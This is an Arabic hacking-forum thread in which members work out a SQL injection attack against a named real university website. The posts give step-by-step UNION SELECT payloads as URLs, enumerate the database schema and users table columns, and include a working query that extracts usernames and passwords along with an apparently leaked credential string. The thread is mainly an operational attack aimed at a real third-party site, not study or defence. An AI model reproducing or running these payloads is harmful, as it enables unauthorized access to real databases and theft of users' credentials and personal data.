التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-25-2012, 12:16 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية qasim
 

 

 
إحصائية العضو





qasim غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
qasim is on a distinguished road

افتراضي مجاب: واجهتني مشكلة في استخراج اليوزر والباس بعد الحقن في هذا الموقع


السلام عليكم ايها الاحبة

اليوم كان لي اول موقع اطبق فيه دورة الحقن المتقدم للمبدع الاخ نورالدين

وطبقت في هالموقع ونجحت بفضل الله ومن ثم بفضل الاخ نورالدين ووصلت الى اسم الجدول ولكن

في المرحلة الاخيرة لاستخراج اليوزر والباس

لم استطع اظهارهما

فاجوا من الاخوة المساعده والتفصيل في سبب عدم ظهورهما في المرحلة النهائية



http://varsitycampus.com/results/sin...st.php?id=1289' UNION /*!SELECT*/+1,2,group_concat(users,0x3a,username),4,5,6,7,8,9 ,10+from+varsityc_db1.users-- -




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC ,h[ijkd la;gm td hsjovh[ hgd,.v ,hgfhs fu] hgprk i`h hgl,ru


التعديل الأخير تم بواسطة qasim ; 05-25-2012 الساعة 12:19 PM.

   

رد مع اقتباس
أفضل جواب - كتبه
قديم 05-25-2012, 12:47 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي


تفضل
طريقتك مو صحيحه وهاذيك الطريقه تنعمل لما تكون اكثر من قاعده والاستعلام مو متثل ماانت كاتبه

تفضل الحقنه

انسخ كل شيء وحطه بالمتصفح

كود PHP:
http://varsitycampus.com/admission/single_post.php?id=1466'+and+1=0 UNION /*!SELECT*/ 1,2,/*!CONCAT*/(username,0x3a,id,0x3a,password),4,5,6,7,8,9,10+from+users-- ///vbspiders hackers 
انسخ كل الحقنه وراح يضهر
اليوزر والباس
snayeem375d93117c5c761b1cfba4c47f285074

التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 


التعديل الأخير تم بواسطة mido868 ; 05-25-2012 الساعة 02:53 PM.

   

رد مع اقتباس
قديم 05-25-2012, 01:01 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية qasim
 

 

 
إحصائية العضو





qasim غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
qasim is on a distinguished road

افتراضي


حياك الله ايها المكرم وبارك الله في مسعاك

لكن اخي لم تظهر اليوزر والباس

ما زالت المشكله

سوف اشرح اخي الكريم الطريقه التى اتبعتها

http://varsitycampus.com/admission/s...php?id=1466%27

ظهر الموقع مصاب

ومن ثم اظهار عدد الاعمدة المصابة:

http://varsitycampus.com/admission/s...st.php?id=1466' order by 10-- -

عدد الاعمدة المصابة = 10

ومن ثم اظهرت العمود المصاب من خلال هذا الامر:

http://varsitycampus.com/admission/s...st.php?id=1466' UNION /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10-- -

ومن ثم اظهرت اصدار القاعدة :

http://varsitycampus.com/admission/s...st.php?id=1466' UNION /*!SELECT*/ 1,2,version(),4,5,6,7,8,9,10-- -

5.5.21-55


,ومن ثم استخرجت اسم القاعدة:

http://varsitycampus.com/admission/s...st.php?id=1466' UNION /*!SELECT*/ 1,2,database(),4,5,6,7,8,9,10-- -

varsityc_db1


ومن ثم استعملت هذا الامر حتى استخرج معلومات السيكما:

http://varsitycampus.com/admission/s...st.php?id=1466' UNION /*!SELECT*/ 1,2,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),4, 5,6,7,8,9,10+from+information_schema.columns-- -

CHARACTER_SETS:CHARACTER_SET_NAME:information_sche ma



ومن ثم استخرجت اسم الجدول:

http://varsitycampus.com/admission/s...st.php?id=1466' UNION /*!SELECT*/ 1,2,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),4, 5,6,7,8,9,10+from+information_schema.columns+where +column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)-- -

ظهر لي جدولين..السؤال اي واحد اخذ

users:password:varsityc_db1



wallusers:mem_pass:varsityc_db1


ومن ثم شفرت اسم الجدول اللي هو users

,وعملت هذا الامر:

0x7573657273

http://varsitycampus.com/admission/s...st.php?id=1466' UNION /*!SELECT*/ 1,2,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),4, 5,6,7,8,9,10+from+information_schema.columns+where +table_name=0x7573657273-- -

ظهرت لي هذه المعلومات..

HSC Admission 2012 -13 session Rules & Procedure users:id:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:first_name:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:last_name:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:username:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:email:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:password:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:dob_day:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:dob_month:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:dob_year:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:gender:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:university:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:religion:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:type:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:photo:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:code:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:u_status:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:online:varsityc_db1

Posted at - 8 Total hit this page : 9
4
Share on facebook Share on twitter Share on email Share on print More Sharing Services 0

7 users:u_date:varsityc_db1

Posted at - 8 Total hit this page : 9
4

=====================

اخذت هذه المعلومات التى تشبه اليوزر والباس:

users:id:varsityc_db1


users:username:varsityc_db1


users:email:varsityc_db1


users:password:varsityc_db1

ممكن توضيح من الاخوة عند ظهور هذه الكلمات اي واحده اختار ك

table_name
table_schema
column_name


ارجوووا من الاخوة التوضيح حتى تزووول هذه المشكله

التعديل الأخير تم بواسطة mido868 ; 05-25-2012 الساعة 02:53 PM.

   

رد مع اقتباس
قديم 05-25-2012, 01:44 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية qasim
 

 

 
إحصائية العضو





qasim غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
qasim is on a distinguished road

افتراضي




اشكرك اخي الحبيب بس ليش ما تظهر لي اليوزر والباس

قهرررررررررررررررررررررر

هل للبروكسي له تأثر

اخي الكريم السؤال ايضا:

عندما دخلت الى

login

ظهر لي

email & password

وانت ظهر عندك اليوزر وليس الايميل

الصور المرفقة
نوع الملف: jpg Picture1.jpg‏ (133.5 كيلوبايت, المشاهدات 19)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات

التعديل الأخير تم بواسطة mido868 ; 05-25-2012 الساعة 02:50 PM.

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 09:53 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0